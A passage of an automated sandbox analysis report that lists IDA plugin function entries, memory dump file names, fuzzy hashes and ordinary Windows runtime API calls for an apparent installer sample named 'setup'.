                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 9db41762daa94644aedc5f6f3b4e0c88c2b6fac592911a734ec6758cbbac5cb1
                                                                                                    • Instruction ID: 5da8ad74285945e22b8f0729416b54bab4528189a3d6ac29ed3816b039356707
                                                                                                    • Opcode Fuzzy Hash: 9db41762daa94644aedc5f6f3b4e0c88c2b6fac592911a734ec6758cbbac5cb1
                                                                                                    • Instruction Fuzzy Hash: 74310871A05B14CFDB20FF78D589A9ABBE0BF10704F85492DE88697601E735F894CB82
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 021b6f9110a7ebc5c05cb74207f2f5587e00c03ef1ebd527ae271b0fcd08ec24
                                                                                                    • Instruction ID: 8848059b26d59ef9dc81b659181e7028f9ac7c3e9d7b1952446f6d260433f42a
                                                                                                    • Opcode Fuzzy Hash: 021b6f9110a7ebc5c05cb74207f2f5587e00c03ef1ebd527ae271b0fcd08ec24
                                                                                                    • Instruction Fuzzy Hash: B6111675904B048FCB20FF68C586A9AB7E0BF04708F418D2DE8CA97611D775F9999B82
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alloca_probe_16memset$qsort
                                                                                                    • String ID:
                                                                                                    • API String ID: 67108361-0
                                                                                                    • Opcode ID: 2c962206c5e84be67075d493e75ca477334f597fa2bbff4fc36c600258a8175a
                                                                                                    • Instruction ID: 1dece8db79abc4740717c061cd277e083822b201a0b06b45e55282ead937056e
                                                                                                    • Opcode Fuzzy Hash: 2c962206c5e84be67075d493e75ca477334f597fa2bbff4fc36c600258a8175a
                                                                                                    • Instruction Fuzzy Hash: 5EC18B78A5060AAFCB14DFA8C5919ADBBF1FF19304B20426ED556D7B41D730EAA1CF80
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID: $@$P
                                                                                                    • API String ID: 1294909896-3265977826
                                                                                                    • Opcode ID: 8bc6d6db64fda5ebeadfc1a4a3aec7cbc47f59689aeb3d1abf27226e4e36b791
                                                                                                    • Instruction ID: 1e30dd976e6388ceaa6b4dedb3ea7d7de80fc610940e67f12080901c7fb4f6a9
                                                                                                    • Opcode Fuzzy Hash: 8bc6d6db64fda5ebeadfc1a4a3aec7cbc47f59689aeb3d1abf27226e4e36b791
                                                                                                    • Instruction Fuzzy Hash: 0DB115B0A08701DFD704EF29D58871BBBE0FF85304F51886DE8898B2A5D775D898DB82
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DDA0: malloc.MSVCRT ref: 0032DDB5
                                                                                                    • strlen.MSVCRT ref: 001F3213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocstrlen
                                                                                                    • String ID: ^$dict
                                                                                                    • API String ID: 770973918-1509776474
                                                                                                    • Opcode ID: 4b5b34413fe8d3be8e227fcaeedfca08ab9dfedfc78d2a61e984fc69d3568bea
                                                                                                    • Instruction ID: 567475537822c3ba2ed93249c0390d1e0e0324c46c1da7c336041e1bbd81ef9f
                                                                                                    • Opcode Fuzzy Hash: 4b5b34413fe8d3be8e227fcaeedfca08ab9dfedfc78d2a61e984fc69d3568bea
                                                                                                    • Instruction Fuzzy Hash: 198139B0508308CFDB14DF18D48476ABBE0FF94318F15896EEA985B352D3B5DA45DB81
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DDA0: malloc.MSVCRT ref: 0032DDB5
                                                                                                    • strlen.MSVCRT ref: 001FF43B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocstrlen
                                                                                                    • String ID: ^$lzp
                                                                                                    • API String ID: 770973918-2856938714
                                                                                                    • Opcode ID: 5afd63195c424f20f1475d55ba9295ca7fcaf0065349b4900e6e2646c25674e7
                                                                                                    • Instruction ID: b4f689fb3e09f2a4373d08336d402a1b62fcc3f954f0881e2871d38934f3d041
                                                                                                    • Opcode Fuzzy Hash: 5afd63195c424f20f1475d55ba9295ca7fcaf0065349b4900e6e2646c25674e7
                                                                                                    • Instruction Fuzzy Hash: 9E517BB16083058FD710DF28D88472BBBE0FF84358F15892EEA889B352D7B5D945DB82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: parm#$this$}
                                                                                                    • API String ID: 0-728413427
                                                                                                    • Opcode ID: 1d9a11555bca75bcdafbb9e682b500e68f1b9281210f1d314406902d5e6985a0
                                                                                                    • Instruction ID: d981bd4f589150825b42869c0eca21b4436c6686fc71073c59dd3b013d47f574
                                                                                                    • Opcode Fuzzy Hash: 1d9a11555bca75bcdafbb9e682b500e68f1b9281210f1d314406902d5e6985a0
                                                                                                    • Instruction Fuzzy Hash: EB515E7151D392CBCB118F28C0C43A97BE0AF65305F1988BDDCC98F346D7B988999B65
                                                                                                    APIs
                                                                                                      • Part of subcall function 00210FF1: malloc.MSVCRT ref: 00210FF5
                                                                                                    • ceil.MSVCRT ref: 0023A3BE
                                                                                                    • Sleep.KERNEL32(00000000), ref: 0023A3CC
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0023A3E0
                                                                                                      • Part of subcall function 00211B93: GetCurrentThread.KERNEL32 ref: 00211BBE
                                                                                                      • Part of subcall function 00211B93: SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00211BCA
                                                                                                      • Part of subcall function 00211B93: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,0023C6AC), ref: 00211BD2
                                                                                                      • Part of subcall function 00211B93: SetThreadAffinityMask.KERNEL32(0023C6AC,00000000), ref: 00211BE0
                                                                                                    • free.MSVCRT ref: 0023A403
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AffinityMask$CounterCurrentObjectPerformanceQuerySingleSleepWaitceilfreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1740532293-0
                                                                                                    • Opcode ID: f87c65072e10caa7db4c4c7a53c88135ff8fa53cb04d2d407a53a90de059f452
                                                                                                    • Instruction ID: 8b54c3f9932f655bbe8359097410159245b63673cbe831bb2dd041b673515fe0
                                                                                                    • Opcode Fuzzy Hash: f87c65072e10caa7db4c4c7a53c88135ff8fa53cb04d2d407a53a90de059f452
                                                                                                    • Instruction Fuzzy Hash: 1631C5B1918702EBD7117F20D90939A7BE8FF50350F104DADF1D6A01E2EB7199758B86
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215749: EnterCriticalSection.KERNEL32(-0000013C,002160B3,?,00000000,0022CD3D,-000000B8,?,00216164,?,00000000,?,0021676F,0022CD3D,00000000,00000000,?), ref: 0021574F
                                                                                                    • __aullrem.LIBCMT ref: 0021733A
                                                                                                    • SetEvent.KERNEL32(?,?,00001000,?,?,?,00000000), ref: 00217392
                                                                                                    • SetEvent.KERNEL32(?,?,00001000,?,?,?,00000000), ref: 002173AB
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002173C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Event$CriticalEnterObjectSectionSingleWait__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3926123277-0
                                                                                                    • Opcode ID: 86ca176c12a838fb221ecf60925ce24f512ef180e64ceae19b0cdaf2a7b98086
                                                                                                    • Instruction ID: c9d54285e7265d7b86d421b3e7fda90ec6944c1028a1904245e5c31a8dd5dce4
                                                                                                    • Opcode Fuzzy Hash: 86ca176c12a838fb221ecf60925ce24f512ef180e64ceae19b0cdaf2a7b98086
                                                                                                    • Instruction Fuzzy Hash: CA417872624B019FC7249F38C885BDBB7F6AFD4310F14896DE9AA87241DB70B895CB01
                                                                                                    APIs
                                                                                                    • UnmapViewOfFile.KERNEL32(?,00000000,00000002,00000000,00217561,00000000,?), ref: 0021660C
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000), ref: 002166A3
                                                                                                    • DeleteCriticalSection.KERNEL32(0017152A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7E86), ref: 002166CE
                                                                                                    • VirtualUnlock.KERNEL32(?,?), ref: 002166E1
                                                                                                      • Part of subcall function 0021128A: GetCurrentThreadId.KERNEL32 ref: 0021128A
                                                                                                      • Part of subcall function 0021128A: WaitForSingleObject.KERNEL32(0035BD14,000000FF,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00211299
                                                                                                      • Part of subcall function 0021128A: CloseHandle.KERNEL32(0035BD14,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 002112A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCriticalCurrentDeleteEventFileHandleObjectSectionSingleThreadUnlockUnmapViewVirtualWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2068595648-0
                                                                                                    • Opcode ID: 0f33093fd9540eb8967d18cd8a252a9e74ddbc23bba4e562318d98f392d13759
                                                                                                    • Instruction ID: 95b3bafa06d039d7e22beb3f1d02b3d4e6fd504ab20ca8dad3a1c17fddc7d904
                                                                                                    • Opcode Fuzzy Hash: 0f33093fd9540eb8967d18cd8a252a9e74ddbc23bba4e562318d98f392d13759
                                                                                                    • Instruction Fuzzy Hash: 6931DE71A20566BBCB556F74DE45AD9F7EABF24310B408020FA4052462CB76ACF1DF90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
